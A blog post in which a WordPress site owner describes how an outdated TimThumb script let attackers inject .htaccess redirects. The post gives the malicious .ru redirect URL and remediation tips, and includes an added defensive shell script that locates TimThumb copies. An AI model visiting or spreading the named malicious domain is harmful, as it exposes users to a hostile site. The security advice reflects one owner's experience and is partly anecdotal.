Nobody likes one of those days - when you wake up to see that your website’s security is compromised. Hacked or close to it.
Well, I just had one of those days (and on a weekend!).
Thanks to the participants of the Blogging Tips 101 Contest. They were the ones who first reported to me that they could not direct their friends to their contest posts and could not access their contest posts themselves either.
At first I took a couple of those emails lightly and told them that it could be a temporary issue and asked them to try again later. I was able to load my blog(s) both in the front end and the back end without any problems. So I didn’t take it seriously.
Then the number of emails I got from other people increased. Everyone was complaining that my site redirected to a strange domain which didn’t load at all.
This is what happened
Since I realized that the issue was getting serious, I dived in to explore it. I found some nasty lines of code in my .htaccess file. Following is the code, just in case anyone is curious (or may need it in the future, although I wish it never happens).
Looks nasty, doesn’t it?
What the code does is hijack my search engine and external traffic. If someone reaches one of my blog’s pages through a search engine (all the major and many obscure search engines are listed in the code), or clicks a direct URL to one of my blog posts (as happens when a contest participant emails a friend a link to his contest post), that visitor is redirected to the following URL:
http://uaroyalys-daliachu.ru/industry/index.php
The thing is that the above domain is blacklisted. So basically all my search engine and direct traffic was ending up on a dead page.
What I did
As a tense website owner, all I did was delete those lines of code, save the .htaccess file and check whether the redirect was still in place. I also cleared my browser cache and found that the problem was solved.
I did a Google search for one of my review posts and YES, I could load the page correctly from the Google SERP.
I breathed and started doing my regular work. About 10 minutes later I got another email saying that the issue was not solved yet. I asked that reader to clear his browser cache and try again, but still no luck.
I went back to my .htaccess file and those lines of code were back there. I felt as if I was being haunted or something.
TimThumb script was the black sheep
Well, not exactly. I had to spend hours on chat with my hosting provider HostGator, cleaning up and doing other “this and that” stuff. Ultimately this is the response (in short form) from HostGator:
Your account was compromised through direct exploit of the timthumb script. This script is used in gallery management.
What is TimThumb?
Here’s the original definition:
A small php script for cropping, zooming and resizing web images (jpg, png, gif). Perfect for use on blogs and other applications.
Developed for use in the WordPress theme Mimbo Pro, and since used in many other WordPress themes.
As you can read, many themes and plugins use this script whenever they need to handle thumbnails.
I doubted the Thesis theme
Now, since I’m using the Thesis theme on all my websites, I thought that Thesis was the one that had the outdated TimThumb script, also because Thesis was the one thing common to all the websites. I suspected some plugins, but I was not using those plugins on all my sites.
I Googled a bit and found that the Thesis theme is not affected by this issue. However, I went ahead and posted a thread in their forum just to confirm, and yes, I learned for sure that Thesis could not be the problem.
That is because Thesis uses its own version of the TimThumb script, which is not affected by this vulnerability.
The original cause
The technicians at HostGator did a great job of combing through my files to spot the issue. Here’s the reply:
After reviewing the logs provided I see that the website was compromised using the timthumb script found in the theme dailyedition. Below is the related log showing the malicious user pulling the avatar2.php file on to the account which was later used to compromise the account. As you can see the GET request was made via the wp-content/themes/dailyedition/thumb.php file.
OK, I’m glad that I now know the root cause. But at the same time, I was really upset because of the time and effort it took even to find out the cause.
I’m sure not all bloggers are technically skilled enough to understand PHP scripts and vulnerability issues.
Bullet points
You need to be aware that the TimThumb script is widely used by many free and even some premium themes and plugins.
You need to make sure that the version of the TimThumb script you have is up to date. This is exactly how the security of my sites was compromised: I had an outdated version of the script.
The (outdated) script does not have to be in your active themes or plugins. It can sit in one of your inactive themes or plugins and still expose your site. So look through the unused themes and plugins installed in your site’s folder.
I know this is all overwhelming and upsetting. You might have the following questions in mind.
How would I know if the TimThumb script is in any of the themes or plugins I have installed?
Go to the control panel of your hosting account and open File Manager. It usually has a search option. Search for timthumb.php or thumb.php. If you find that the script belongs to a theme or plugin you are not using, simply delete that theme or plugin (its folder).
What if the TimThumb script is present in a theme I’m using?
In this case, you need to make sure that the script is up to date (that is, the latest version). The official updated code can be obtained from here.
This is a tiring process. I can’t remember to check often.
Yes, I understand. There is a WordPress plugin for this purpose: Timthumb Vulnerability Scanner. The plugin automatically checks every day whether your TimThumb script is up to date; if not, you can update it with a click.
OK, but there’s one more thing. If you’re using the Thesis theme you should not use this plugin, because Thesis uses its own version of the script and does not run into this issue at all. The plugin just checks the version number and will prompt you to update. If you update, you will lose the Thesis-specific script and end up with the generic TimThumb script; you will have issues with thumbnails, and later you may run into vulnerability issues as well.
On the other hand, if you’re not using Thesis (and I think the Genesis and Headway themes are also safe), and in particular if you’re using a free theme, make sure you click “Upgrade” whenever the plugin’s scan finds an outdated version.
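For those with shell access, here is the same check as the File Manager search above, run over the whole install so that inactive themes and plugins are covered too. This is an added example, not code from the original post or from any plugin; it assumes the script is named timthumb.php or thumb.php and declares its version as define('VERSION', '...'), and the sample tree it scans is constructed inline.

```shell
#!/bin/sh
# Added example (not from the original post): list every copy of the TimThumb
# script under a WordPress install, active or not, with the version it declares.
# Assumptions: the file is named timthumb.php or thumb.php (the names the post
# searches for) and states its version as define('VERSION', '...'); copies
# without such a line are reported as "unknown" and deserve a manual look.

# find_timthumb ROOT
# Prints one line per copy found: "<path> <version>".
find_timthumb() {
    root="$1"
    find "$root" -type f \( -name 'timthumb.php' -o -name 'thumb.php' \) |
    sort |
    while IFS= read -r file; do
        # Pull the first define('VERSION', '...') out of the file, if any.
        version=$(grep -Eo "define *\( *['\"]VERSION['\"] *, *['\"][^'\"]+['\"]" "$file" 2>/dev/null |
                  head -n 1 | sed -E "s/.*, *['\"]([^'\"]+)['\"]/\1/")
        printf '%s %s\n' "$file" "${version:-unknown}"
    done
}

# Constructed sample tree (not a real site): an active theme without TimThumb,
# an inactive theme carrying an old copy, and a plugin copy with no version line.
demo_root=$(mktemp -d)
mkdir -p "$demo_root/wp-content/themes/active-theme" \
         "$demo_root/wp-content/themes/old-theme" \
         "$demo_root/wp-content/plugins/gallery"
printf '<?php // no thumbnail script here\n' > "$demo_root/wp-content/themes/active-theme/functions.php"
printf "<?php\ndefine ('VERSION', '1.10');\n" > "$demo_root/wp-content/themes/old-theme/thumb.php"
printf '<?php // copied in without a version constant\n' > "$demo_root/wp-content/plugins/gallery/timthumb.php"

# Run it against a real install with: find_timthumb /path/to/public_html
find_timthumb "$demo_root"
```

Any copy listed under a theme or plugin you do not use can simply be deleted with its folder; copies in use are compared against the current upstream version.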
Something more
It is also good to use some sort of security plugin so that you know when a threat arises. I’m using WordPress Firewall 2.
Takeaway
It is absolutely not enough just to write blog posts. Running a blog or a website needs something more: either you equip yourself with the knowledge needed on the tech side, or you outsource the task to a friend or someone you trust.
On a side note, I would like to hear more about this issue. If you know more, share it in the comments so that it might help others keep their websites safe. Thanks.
And, don’t forget to share this post and show some social media love. Your friends/followers will surely appreciate that; of course, me too!